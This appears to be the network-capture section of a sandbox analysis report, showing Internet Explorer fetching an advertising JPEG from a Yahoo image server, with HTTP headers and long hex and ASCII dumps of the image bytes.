                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC48INData Raw: 66 95 58 ed 10 ce 23 05 95 5e cd 39 4f 46 c1 11 da f7 6e cc 87 4e d6 23 8d 51 4a 2c 44 07 ca e8 81 15 f7 6a 4e e8 14 b1 60 bf a3 c4 5c 56 99 61 73 57 8a a9 34 2d b9 67 e2 95 0e eb 9a de 45 da 4a 18 21 6c 7f 3b 27 40 2a d7 55 1b 91 5e 38 7e b2 db 92 d7 29 63 ab 43 49 16 3a e9 b9 5d a3 82 59 1b 6c cc be 15 55 54 a5 c7 48 e1 a4 73 1c 71 d7 84 97 7b dc c8 60 c9 5a 06 b5 79 c8 f6 f2 37 f6 1a 47 fe 8b bc ae 76 cd 1b 3c 6d b0 51 bb 6d 5c 57 45 9a b4 f1 60 53 e8 ae 07 f1 90 19 4c 42 70 dd 45 8a b2 a6 56 b0 91 4f 19 66 e3 55 e5 05 c2 d7 64 11 8f b2 24 32 33 2a 96 8c 29 ce 3a 84 b2 7d 46 3f 86 0d 94 cb 53 cb 29 2c 5e a8 ef de 46 78 aa 96 22 69 55 23 21 b5 12 ad 1a e9 12 cb 92 49 5e bc 40 4c f7 ed bd cf e4 22 81 e4 d9 55 5a d3 48 fd 15 65 ae 22 52 59 cf fe 87 5c 44
                                                                                                                                                                                                                                  Data Ascii: fX#^9OFnN#QJ,DjN`\VasW4-gEJ!l;'@*U^8~)cCI:]YlUTHsq{`Zy7Gv<mQm\WE`SLBpEVOfUd$23*):}F?S),^Fx"iU#!I^@L"UZHe"RY\D
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC49INData Raw: 31 82 08 19 f2 1a de 98 a9 61 ff 00 c0 63 ac e2 dd 4d b1 1b b7 1f 3b 7e 2b 96 13 ca b4 92 f4 65 a5 93 73 00 73 44 c4 80 af 8d 52 ab 9c ea c7 47 2c 31 f2 2a ae 7c 3e 91 82 ae ca eb 65 34 23 5f 7a 2b d0 af bc ea 7f 79 d8 e8 93 9b ec a7 1f b7 61 ea 5f 49 bd c6 af e2 5e ef 2a 7b 39 28 18 cb fb 03 2c 26 d3 79 cb 42 25 85 97 2d 44 d1 ca ea 41 c0 c7 5b c5 2e 08 61 91 30 1e 12 c9 76 46 50 e5 8a a3 4d 3c 28 32 6e 86 ca 85 c9 3d 79 97 1e 55 2c 00 1c 0d 35 bd ca 8f 5c 3d 06 58 c0 ec 94 c0 0b f7 d0 56 eb be c3 47 d1 74 23 0f fe 82 6b 67 db 2f b4 18 46 d7 a9 cf 4a 35 92 6c e4 9e f1 d7 ec 71 d3 ba 91 97 93 d3 82 39 ca ba 90 c8 b8 df ac 5d fb 18 a0 eb d6 4d 28 79 23 62 d7 74 f2 2f aa 80 a0 12 02 a1 47 67 26 cc 8c 48 8c 19 a6 10 40 40 1f 0b e2 7c 51 89 58 53 48 51 11 58
                                                                                                                                                                                                                                  Data Ascii: 1acM;~+essDRG,1*|>e4#_z+ya_I^*{9(,&yB%-DA[.a0vFPM<(2n=yU,5\=XVGt#kg/FJ5lq9]M(y#bt/Gg&H@@|QXSHQX
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC51INData Raw: 41 c8 5b 65 7d d4 21 a3 fb 09 d2 05 88 36 18 c1 40 a4 49 66 28 59 9a 46 bb f2 36 f2 78 a0 10 b5 c9 54 17 9b a1 40 bb c5 5e c3 47 05 76 61 b0 6d 47 d5 4e 5d da 4c 9e f8 c9 ec 2d 87 8a 64 af 2c 9d 7d b7 90 68 92 5a 43 d8 10 d3 49 e8 8d db 0c 63 2a a6 d3 7a 39 f2 67 0d cd 4f ed 4f ad e0 0d be c3 2b 8d 2a 8c 85 86 81 39 5c fe b1 48 23 14 85 62 c0 c3 6f a2 9e b9 2d b9 5c fd b2 e7 26 21 52 4b f2 5c dc b3 4c 20 84 d1 a9 24 33 17 97 2b 2e 94 2e 3a e9 01 c8 54 31 d9 c5 48 3f 10 b7 7b dd 0e f3 93 2a 1d 77 8d 65 63 55 60 d4 f9 55 ef d4 b0 b4 18 0d 62 b4 50 02 42 06 24 11 b9 df ea 46 4e fb d7 be 65 9a 4e 42 e4 a4 23 eb 22 05 63 01 84 5f cb 22 d6 45 28 1a d1 59 41 5d 0c 59 41 3d 70 4a 15 98 0c b5 70 46 99 c9 f2 73 ca fe 18 87 c7 b8 38 28 44 2c 4e 39 8a b5 ee f1 a5 20
                                                                                                                                                                                                                                  Data Ascii: A[e}!6@If(YF6xT@^GvamGN]L-d,}hZCIc*z9gOO+*9\H#bo-\&!RK\L $3+..:T1H?{*wecU`UbPB$FNeNB#"c_"E(YA]YA=pJpFs8(D,N9
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC52INData Raw: 38 0d 95 6d 07 45 d6 4b d9 58 3a e4 33 a9 66 03 12 50 7f b8 c2 48 ba cf c7 23 43 12 8a 37 50 71 b8 fd a9 3a 97 8b 8f d9 2e f4 61 5d fd a5 ac 9f d6 49 12 ae 39 09 18 cb 12 08 d6 46 39 3c be 46 50 73 93 b6 5c 90 a5 94 ec ef 21 5d c9 fa 95 bd e2 06 2d a1 91 a9 35 22 ce 33 d3 36 43 fe 38 d2 41 91 ec fa 07 91 e3 4b 8f 3c 65 b5 28 d1 ca 76 9a 16 0a d8 92 2c a9 f5 c9 18 c3 28 39 52 d2 3a e4 32 6b 11 c3 2e 23 7f c8 69 9b fb 32 32 30 27 52 fb 07 46 76 08 bf b3 a7 f6 72 dc ea 1c 2e f9 2b 0d 34 9e 18 9a e0 9c af 58 b0 ca dd 4a 92 cb b1 95 ab 39 27 a8 96 26 46 2a c2 ac 64 d9 8c 00 40 58 55 46 71 c3 ee d9 4f 45 35 95 77 1b 08 1f 22 62 00 5c e5 b8 c2 41 b1 02 f7 53 fc b2 a5 93 1b 80 4b 78 a7 8f a9 27 cf 4a 4e c5 ea dd 12 28 21 eb db ff 00 92 2d 01 ec 93 72 3d 1c 7b 51
                                                                                                                                                                                                                                  Data Ascii: 8mEKX:3fPH#C7Pq:.a]I9F9<FPs\!]-5"36C8AK<e(v,(9R:2k.#i220'RFvr.+4XJ9'&F*d@XUFqOE5w"b\ASKx'JN(!-r={Q
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC53INData Raw: 59 2c 6e 91 da 32 42 f7 ed 12 6a a8 5d d9 ca d9 d2 b7 d9 39 71 49 0d b9 6e c7 7e 11 8e 54 c8 4a d3 21 d1 4a c9 31 bd 24 bd 91 fb fa e8 7e d8 db 93 b2 d0 e8 7e 22 cc 52 b2 3d 12 64 8a ff 00 82 fa 32 ba c4 ff 00 b1 32 d0 c7 e1 18 25 fa d7 8a b6 8a b9 12 74 d1 0b 33 bd c6 29 74 71 67 14 24 4a 25 78 86 99 07 71 43 15 59 db 62 71 4a fd 22 9b 93 75 76 49 4f e8 e4 ce 54 8e 4d 8b 14 9e c7 89 df 68 8c 5a 66 2e 86 5a 49 24 5b 6b e9 0f 25 b4 97 48 ac 92 aa 8b 24 e7 1e d1 36 7f 1b 22 ab 62 8e 59 74 b4 4b 0e 5e dc 48 5a 7b 30 bd b1 93 95 0e 6e 5a 21 93 14 16 aa fe cf 9d 34 ba 27 34 d3 4d 92 76 7f 12 12 ae 28 8e 75 11 67 46 59 c1 bb 5a 7e d1 f8 ef 63 32 cd b1 09 35 d1 cd fb 89 72 7f 48 7e 3d 1c a4 8e 53 28 fc 65 bf 12 11 04 a4 38 d3 f0 fb 12 23 1b 37 17 4c d0 bb 3f 1f
                                                                                                                                                                                                                                  Data Ascii: Y,n2Bj]9qIn~TJ!J1$~~"R=d22%t3)tqg$J%xqCYbqJ"uvIOTMhZf.ZI$[k%H$6"bYtK^HZ{0nZ!4'4Mv(ugFYZ~c25rH~=S(e8#7L?
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC55INData Raw: 84 c1 cc e9 93 f9 30 8b 9c 6f 2e 41 5b 84 39 10 53 5b 51 ae c7 f2 81 6c 44 f6 51 0e bc 6c 0d 90 34 de 05 f7 1b 87 04 d0 60 54 a2 e9 b0 04 49 01 45 ce 9d e0 1e fb 94 48 60 d5 da 30 9a 19 96 b4 dc 9d f7 d8 28 00 cb ea ee 64 fb ca 73 19 8f 0d e1 c7 d4 ff 00 ee 70 40 bd 8f 6b 1a 1b 76 8a ae c3 49 e8 2e 56 8a 2c 13 5a ae 2d b3 5b d4 a0 cf 07 e1 da 45 16 8f b8 8d ca 0c 7d 62 43 46 00 6b 44 92 ac c6 86 b4 81 be e6 fb ca 91 cb f9 2b 59 d8 0c 35 01 03 00 2b 20 06 cb 2a 78 48 2a db 2b a8 3b 10 54 97 34 fa 16 91 fe 54 8c 11 d1 49 0d 3a 7d 2e 8b 9d e1 ce 92 dd c0 75 bf 95 96 cb 8b b9 f2 08 ea ad 51 b3 cc 35 b9 9e ea 2c 65 c4 fd 67 24 df f0 81 68 74 ef 24 83 d1 37 fd 45 77 17 17 c1 02 93 51 6d 26 33 3d 0f d4 e3 3b 94 1b e1 19 e6 23 77 a8 0d 83 a8 10 2c 4e 90 07 79 50
                                                                                                                                                                                                                                  Data Ascii: 0o.A[9S[QlDQl4`TIEH`0(dsp@kvI.V,Z-[E}bCFkD+Y5+ *xH*+;T4TI:}.uQ5,eg$ht$7EwQm&3=;#w,NyP
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC56INData Raw: fc 35 10 e0 d6 01 15 0d b0 15 66 33 c4 b0 53 f1 4c 70 23 53 1a e0 f8 3d 35 00 54 ea 75 de 36 01 17 37 ae 4a 7d 20 f1 83 f6 9e 8a 39 38 90 b5 d4 27 63 2b ca 4e a7 2d d5 f5 3a 53 9c f2 37 33 12 9c 5a 0c 68 6a aa 05 a1 cd 79 69 ff 00 ea 57 8c 61 88 83 55 b5 11 60 3f 4c 80 4f e0 a0 6a 41 04 ea e6 bc 37 8a 8a 80 9a 81 d0 e7 34 36 e1 c0 11 72 57 c0 75 2a fe 46 92 34 00 ed da 09 d9 10 fd 77 1a a5 a4 14 f6 54 68 81 55 a6 08 6c ca 15 c0 65 9e 72 7b 90 8c b5 b0 af c2 58 1e 09 04 a7 3e b8 3e 51 50 cb 61 36 83 4d bc a1 a2 c2 f6 94 1e d7 b8 17 6b 99 b7 da 0e a5 2c 7d da 1b 02 0c 77 4c 63 ba bc 02 53 83 41 96 b8 cb 4b bb 6e 9e 1d d4 07 1f 72 be 23 63 05 b0 42 cb 0f e0 f0 dd 13 26 1b dd 14 43 4e c8 00 10 d3 78 69 6c 7f 92 8c 8d da ff 00 e0 c2 6b a3 3f 10 68 fd b5 2f 0c
                                                                                                                                                                                                                                  Data Ascii: 5f3SLp#S=5Tu67J} 98'c+N-:S73ZhjyiWaU`?LOjA746rWu*F4wThUler{X>>QPa6Mk,}wLcSAKnr#cB&CNxilk?h/
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC57INData Raw: 0b 50 80 19 53 06 39 a7 79 04 b1 ce 3f 5b 13 83 40 93 50 0f 2c 2b 11 62 af c7 cc d3 07 81 96 fd 2f 1f 53 7b 20 e6 3e 45 3a 8d de 36 23 62 a5 ab 45 50 2e 76 28 6a 19 8e 25 ae e6 16 a1 d7 e4 3d 82 81 c3 25 10 e7 18 0a 6a 52 a8 1a 63 aa 06 a5 03 ee d3 b1 54 eb 78 6a b4 e2 a5 17 98 6b 86 e3 b8 4d 7b db 77 d2 00 b7 44 ec 0b ac af 88 eb c7 ff d9
                                                                                                                                                                                                                                  Data Ascii: PS9y?[@P,+b/S{ >E:6#bEP.v(j%=%jRcTxjkM{wD


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                  6192.168.2.74977987.248.118.23443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC16OUTGET /lo/api/res/1.2/BWUYr.M5U6.kf035wsX8Lg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1pbmk7cT0xMDA-/https://s.yimg.com/av/ads/1621266752856-586.jpg HTTP/1.1
                                                                                                                                                                                                                                  Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                                                                                  Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  Host: s.yimg.com
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC58INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Length: 195845
                                                                                                                                                                                                                                  Access-Control-Allow-Headers: X-Requested-With
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                  Edge-Cache-Tag: 343450606465613470501122455183989970294,415930648339712111872285657998251086336,ae7a14591aaf8d474cdb3f92111c923e
                                                                                                                                                                                                                                  Etag: "441833de41dfe8d94ac6f8ce4e751eba"
                                                                                                                                                                                                                                  Last-Modified: Fri, 18 Jun 2021 09:15:35 GMT
                                                                                                                                                                                                                                  Server: ATS
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Date: Thu, 02 Sep 2021 21:11:05 GMT
                                                                                                                                                                                                                                  X-Served-By: cache-wdc5543-WDC
                                                                                                                                                                                                                                  X-Cache: HIT
                                                                                                                                                                                                                                  X-Cache-Hits: 1
                                                                                                                                                                                                                                  X-Timer: S1630617066.900811,VS0,VE1
                                                                                                                                                                                                                                  Age: 648038
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  cld_cache: HIT
                                                                                                                                                                                                                                  cld_hits: 1
                                                                                                                                                                                                                                  cld_by: cache-wdc5543-WDC
                                                                                                                                                                                                                                  cld_latency: 1
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"
                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC59INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 96 00 96 00 00 ff db 00 43 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff db 00 43 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c0 00 11 08 01 70 02 6e 03 01 11 00 02 11 01 03 11 01 ff c4 00 1e 00 00 02 02 03 01 01 01 01 00 00 00 00 00 00 00 00 06 07 05 08 03 04 09 02 01 00 0a ff c4 00 49 10 00 02 02 01 03 03 03 03 03 02 04 04 03 05 03 0d 01 02 03 11 04 05 12 21 00 13 31 06 22 41 07 14 51 23 32 61 08 71 15 42 81
                                                                                                                                                                                                                                  Data Ascii: JFIFCCpnI!1"AQ#2aqB
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC60INData Raw: 8a 4e e5 8a 81 16 51 83 dd aa a8 00 2d 5f 23 9e b3 b3 0f 8d 4f ac 6e 25 ce c0 89 40 d8 a8 76 7a 66 34 ac 39 30 f1 5d 84 31 c9 0c 66 34 98 bb 90 4f b5 55 55 56 b6 56 e5 04 0b bb 03 8e 3a 59 6b 7a 7f 8e 64 8c f6 7e 77 66 ca 0a b0 ea 0b d2 c5 f5 73 93 7c 56 d0 5f a5 9c 7e cc 70 86 52 85 a4 44 53 cb 9d f2 31 da 37 71 c1 e6 eb c1 ab be 3a ec bc f6 6d 37 d3 6e 5c 84 79 12 eb 8f 31 57 ae 87 6a 73 f8 b1 be 0c 04 c6 91 8c 64 49 11 37 43 29 97 6f 6f de 79 1b 47 36 4f 23 91 f2 0f 34 3c 9f fc 8a ea 2a 39 67 9d 9b cb 48 60 2b 19 03 41 50 33 d8 b7 5b f2 89 fc 68 18 2c 70 c8 57 72 c8 d4 db 8a 87 7e 05 82 4d 02 49 26 f9 ff 00 ea c4 b5 2c 11 86 dc 9c 3e 7c f9 11 eb 07 48 4b 31 a1 16 ab 5b 26 f4 82 4c 78 65 8f 12 49 44 28 f2 3d c7 17 05 9e 8b 2a 82 8b c3 6e 04 1f 1f 8f 27
                                                                                                                                                                                                                                  Data Ascii: NQ-_#On%@vzf490]1f4OUUVV:Ykzd~wfs|V_~pRDS17q:m7n\y1WjsdI7C)ooyG6O#4<*9gH`+AP3[h,pWr~MI&,>|HK1[&LxeID(=*n'
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC61INData Raw: b9 db a7 f5 10 9a bc 97 ff 00 2b b8 59 15 d5 80 51 b5 0d 6d 74 0d db 3e dd a0 7c dd 1f e7 80 cf 9b 32 80 07 09 c8 8c b6 b7 36 e5 a9 30 d4 99 48 15 17 55 5e f9 d1 bd 3d 48 a4 08 ea 09 28 13 f7 03 4b 22 22 88 76 95 00 4e 25 57 57 57 f3 b0 ad 0f 68 f6 91 55 d2 0a 52 d4 ca 6a fa 58 f2 ef 94 5a c9 f0 04 dc 11 9e 54 ad 45 a9 f2 5e 07 16 77 90 02 20 dc 7b 87 ba 0b 00 36 84 fd 52 6c d8 27 70 e6 ff 00 70 04 0e 96 71 a8 f3 86 8a 19 8a 4b bd 4b 0a bb ec 4b c4 7c fd b5 13 2b 23 21 48 d8 ac 9b 8d ac 21 4e d2 c4 f9 fc 9a f2 48 fe 07 50 52 93 2e a0 87 56 e6 a5 bb 06 22 02 d6 a0 95 33 58 53 b3 95 c8 2d a9 cc 5c cf 09 79 98 d3 22 45 ba 42 db a4 db 17 1b 4b a0 34 05 fe 09 23 fe dd 01 33 26 62 bd fa 6b 6e 43 d2 90 e4 c9 28 09 0c 58 b3 e6 f7 6c f3 d8 df d8 77 28 c6 42 3c 44
                                                                                                                                                                                                                                  Data Ascii: +YQmt>|260HU^=H(K""vN%WWWhURjXZTE^w {6Rl'ppqKKK|+#!H!NHPR.V"3XS-\y"EBK4#3&bknC(Xlw(B<D
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC62INData Raw: 04 92 e8 9a cc 7a 8e 22 b4 98 7a ba 2f dc 05 60 8b 27 ea 19 63 75 1c 90 50 b9 5e 0f 26 87 c8 e8 ca 56 24 fd b7 b5 6b a1 ef ba c2 cf 86 65 ef 5f 32 74 d4 fc 88 b4 da 06 4c ba be 24 31 41 34 9b a1 d9 26 3f 00 7b 1d 03 c8 85 a8 f2 ac 2b 82 0d 8a 3e 7a 51 61 92 d6 6e fe 61 b1 81 61 c9 ad 6e 07 5e 79 69 a4 5e 1f a1 3a e4 93 e2 64 e0 65 ba 86 98 ee 8d 43 04 ed 64 50 8e 45 da 7c ab 6d de 2b 92 c6 c7 c7 56 1c 14 c0 43 1d 1c eb 76 71 f3 b1 66 8a 1f a8 4a 62 4a 28 41 1e a4 d4 37 e2 9e d6 86 18 0e c4 43 fb 7b 4b 7b 8a 85 2d 75 c7 20 96 3e 6a ef 92 38 ea f2 5a ac 32 34 ff 00 f6 df 9f e3 58 a3 99 8d 26 b4 de fe 7d fe a0 b2 ff 00 fb bb 39 32 11 56 58 e4 0f 1b a0 b5 a3 4a eb fc 12 42 90 0d d7 00 7e 3a ea ff 00 91 e9 df 7f d9 e4 aa 82 9c af c8 b7 79 da 0a b0 64 dd 17 ed
                                                                                                                                                                                                                                  Data Ascii: z"z/`'cuP^&V$ke_2tL$1A4&?{+>zQanaan^yi^:deCdPE|m+VCvqfJbJ(A7C{K{-u >j8Z24X&}92VXJB~:yd
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC64INData Raw: 3a 1f 66 b4 59 c9 48 98 96 c4 01 ae 76 b9 6f c7 a8 ac 4b 68 28 1b 16 0e e2 2c 92 45 1e f3 33 00 29 4b 13 1a 7b 05 5a 50 04 9f 73 1a 07 8e a3 2d 0a 0f 5c 44 d6 9f b3 df 58 9c ba 50 9c ba 65 fd 41 fe 96 5e 66 99 27 8b da 23 28 1f 70 26 f6 86 a4 50 3f cb c0 e2 f9 e0 f1 d1 44 b2 e5 80 7d 75 b5 3b 1a e7 06 60 93 88 61 4b d6 86 d9 57 42 7f b8 30 c0 c5 06 38 c0 80 6e 0c ac b6 41 1e df 79 63 f3 c8 36 09 e0 10 45 f1 d3 52 91 85 15 b9 51 f2 61 d6 f1 ec 41 75 01 b2 3b 9d 7a bc 16 e3 62 49 95 2c 49 00 54 d8 8c c5 c9 01 95 d8 16 62 01 3f b7 81 44 70 08 f3 d7 57 4b 07 24 69 66 ce 81 de be d0 44 01 e2 70 f4 cd e9 06 3a 66 02 a5 c6 31 4b ab 2f fc 44 c9 3e e8 98 32 83 64 13 62 52 c7 82 a2 85 7f 6e 81 87 0d 56 7c 4e 30 8b d2 82 df a2 49 bc 14 28 29 0c 7a 3f b6 7c ff 00 50
                                                                                                                                                                                                                                  Data Ascii: :fYHvoKh(,E3)K{ZPs-\DXPeA^f'#(p&P?D}u;`aKWB08nAyc6ERQaAu;zbI,ITb?DpWK$ifDp:f1K/D>2dbRnV|N0I()z?|P
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC65INData Raw: e3 01 f4 a4 43 ea 93 c9 0c 39 51 2a 21 75 03 26 35 e4 00 66 60 2e 4d bc 8e e0 17 b0 11 b4 fc 9a e4 53 65 28 a5 4c a3 63 47 25 cf 7f d8 c9 ce 14 82 a4 05 a9 9d 42 e4 d0 b0 a8 1b 40 8b cc 9f 6f c7 65 27 8a 36 49 d0 b3 33 8e e3 58 78 f8 a2 50 d5 51 fd bf 9e 91 53 84 e1 c3 5b 13 4e fb d2 f6 69 f0 cd ff 00 c9 89 24 9b bb 11 43 9d 1f b7 d4 3b 26 02 a3 2d 52 cf 77 6b 2e e2 c3 7a ed 04 b8 da 77 29 0d 60 fe 54 81 cf 27 a4 15 20 ab ff 00 5d ed bd c8 1d bc 58 4b 58 4d f5 7a fe b3 de 34 3b 6d 26 2c 82 54 26 4d ed 08 61 2e e6 da 56 c1 36 49 20 78 50 47 8f 3d 08 c8 c8 97 c8 5b f2 f5 d7 9c 71 53 87 dc 34 0c f4 6a 54 f9 fe 2b e6 33 94 aa 9d ea 85 7b 92 7b 0b 2a d1 64 60 48 e0 d0 da 58 f2 39 2a 40 35 d7 b0 84 7f 8e 25 6a c2 97 0c f5 37 ee b0 54 bc c2 16 54 c0 78 70 64 f7
                                                                                                                                                                                                                                  Data Ascii: C9Q*!u&5f`.MSe(LcG%B@oe'6I3XxPQS[Ni$C;&-Rwk.zw)`T' ]XKXMz4;m&,T&Ma.V6I xPG=[qS4jT+3{{*d`HX9*@5%j7TTxpd
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC66INData Raw: 84 46 ee c4 46 24 dc 8d 62 80 0d e3 af 4c 41 0a 06 c1 cd 3c 8f e3 a0 11 14 94 4d 40 49 4f f1 15 26 a3 cc b8 f3 af 94 64 cd 87 1e 5d 16 29 e0 69 14 c9 10 78 d4 02 d1 c7 26 23 d6 44 51 38 1c 84 24 38 00 0e 07 37 d1 28 95 10 cd 41 6a d3 df 66 d7 73 10 fb 61 7e 20 58 d9 c6 dd fa ec d0 e4 fa 5d a9 cd 93 80 80 cb 4c b1 10 1e 23 60 ae e0 b2 a1 0d ee 0c 58 0e 47 b8 03 46 ae fa 5a 6e 2c 57 2d 98 39 d7 bf 46 19 41 a5 a0 24 17 f1 12 cc e6 dd 5b 97 bd 62 de fd 29 f5 24 18 5a b6 26 41 ed 08 b2 53 b3 2c 7b 76 bc 19 8a db 31 98 ee e7 dc 51 94 9f 16 0d 9e 8b 2a 68 94 c4 66 40 2c d7 34 cf 5f 78 57 89 91 89 2a 50 e6 15 73 f3 67 a8 f3 2f 17 ee 17 7c cd 3e 1c 85 2a 25 61 ba 45 fd c6 39 14 0d c0 79 14 4f 23 e0 8e 3a bb 97 39 45 29 67 0e 41 eb d3 d3 ce 33 93 a5 d5 40 ff 00 26
                                                                                                                                                                                                                                  Data Ascii: FF$bLA<M@IO&d])ix&#DQ8$87(Ajfsa~ X]L#`XGFZn,W-9FA$[b)$Z&AS,{v1Q*hf@,4_xW*Psg/|>*%aE9yO#:9E)gA3@&
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC67INData Raw: 08 07 9d bb 3c 15 1c 9a fe 7a a6 fb 58 4a 89 71 76 d3 5d 2b e7 1a 89 2a 74 82 2c 19 86 63 9b 7f 7c a1 db a2 49 1c 78 91 42 fd c5 9e 3b 44 50 e4 a0 8a 46 a5 59 07 3c 8e 49 7a 3b 48 15 5e 3a e2 40 51 62 fd 35 be e7 bc e0 e9 2b 41 c6 0b 27 d2 9b be 46 18 7a 6e 19 8a 10 8a 11 3f cc 0a 5b 3b 8e 01 02 e8 23 51 e1 98 11 c7 e7 a8 04 29 2a 62 19 f5 de dd da 90 e4 b9 a9 9b 6c a9 93 bd 72 7d 73 a7 48 36 d2 62 11 4d 1c a8 d2 4c 24 8c c4 58 d4 81 1d 05 59 34 00 63 f2 47 91 57 d3 29 96 5e c6 d9 d8 7c ed 6e 77 11 dc 4a c6 52 4b 81 e8 dd e7 0c 5c 18 88 88 1e c2 8e ff 00 6d 4c c0 56 c8 8f 25 9e 45 14 08 3b 8d 1e 3f 1c 9e 0e a4 bb 3d 00 14 6a 69 b3 59 a0 e0 b9 0c cd ca bf d5 44 4e e9 b8 ed 1b 64 ed 8d e5 0f 23 63 e3 b3 31 66 77 5f 7b d8 fd c5 08 1b 54 02 38 fd d5 7d 2c 56
                                                                                                                                                                                                                                  Data Ascii: <zXJqv]+*t,c|IxB;DPFY<Iz;H^:@Qb5+A'Fzn?[;#Q)*blr}sH6bML$XY4cGW)^|nwJRK\mLV%E;?=jiYDNd#c1fw_{T8},V
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC69INData Raw: 10 64 45 8b 3a b0 64 c7 91 55 76 bb 80 36 b3 4c 1e 91 8c 9b 56 38 d8 b1 a0 0f 42 5c a4 92 ec 19 aa c7 21 a0 14 f3 8e c9 e2 d4 92 08 5b 92 1e 82 95 7e a2 a6 bc e2 33 37 0e 2c 5c c5 78 d0 e2 c4 b2 4d 02 c7 07 ea 43 3c 4a 40 92 28 82 02 bb d6 5a 33 4a 0f bd 94 ed b0 6c ad 32 5a 03 61 7f 13 e2 c4 c7 4b 7b f4 14 30 e2 38 85 1c 4a 35 fe 39 16 ce 9e d7 6b 5a 20 b5 3d 34 36 44 30 c4 ed 2e 38 ca 8a 4c b1 03 88 72 1e 0e cb 1d f1 70 4d ac 80 2b 21 ab a0 7c df 49 cc 96 a7 c2 1b 09 73 bf 66 b7 e5 66 87 53 c4 32 48 20 39 39 87 19 5b ca 99 88 8f 8e 15 65 cb c4 45 91 a7 65 d8 bd f7 21 98 aa 16 b7 bb 34 8e ac ea 3c 02 78 be 82 90 40 39 b5 b3 a5 19 df f7 12 53 28 a0 b9 0e 72 c9 cd 7f 04 57 f2 35 22 8e d6 2c 79 11 40 26 92 39 92 46 60 01 0b 10 a8 d8 b7 e6 f9 6b f3 60 78 e9
                                                                                                                                                                                                                                  Data Ascii: dE:dUv6LV8B\![~37,\xMC<J@(Z3Jl2ZaK{08J59kZ =46D0.8LrpM+!|IsffS2H 99[eEe!4<x@9S(rW5",y@&9F`k`x
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC86INData Raw: c4 3d 72 39 02 39 1b 3d b9 c2 ff 00 71 4a 26 d4 76 67 d6 db ed ac 4c 7a 70 c9 89 a8 49 14 fe c4 8a 49 71 a5 40 d6 a9 14 ea 76 92 7c d4 53 06 60 7e 15 b8 f8 a5 a7 20 29 0e d5 63 5f 31 f8 ec 08 3f 0a b1 8d d4 5a 8c da e9 cb 99 a5 df 38 b1 13 af f8 96 85 a7 ea 30 b4 92 b6 04 4d 81 95 bf dd db 74 2e f0 92 4f cb 3a 94 0c 2c 53 78 ae aa 25 ff 00 c5 31 85 9e a0 da c3 d6 cc f5 8b 69 9e 39 64 ff 00 95 c0 16 ec 91 60 d4 7a c4 37 a6 71 a1 78 b5 ab 22 37 66 8f 0d 00 73 bd 3e ff 00 7b 40 c1 15 46 f5 8e 70 4a b3 12 37 12 a7 92 69 c9 be 20 08 62 6e 5b f1 ed 09 ca 59 20 a4 8c 26 ba dc e6 33 6f 98 2a f4 e4 1d c8 1b 03 30 3f 7b 0e 41 91 2b 1f 6a c6 b9 49 d8 9c 2a 9b bb 23 b9 e0 5b 5f cf 50 c2 eb c4 2d 4d de f6 f3 8e 20 60 25 0a 76 aa 98 1d 6f fd 0c 8c 49 fa 53 50 4f 4d 6a
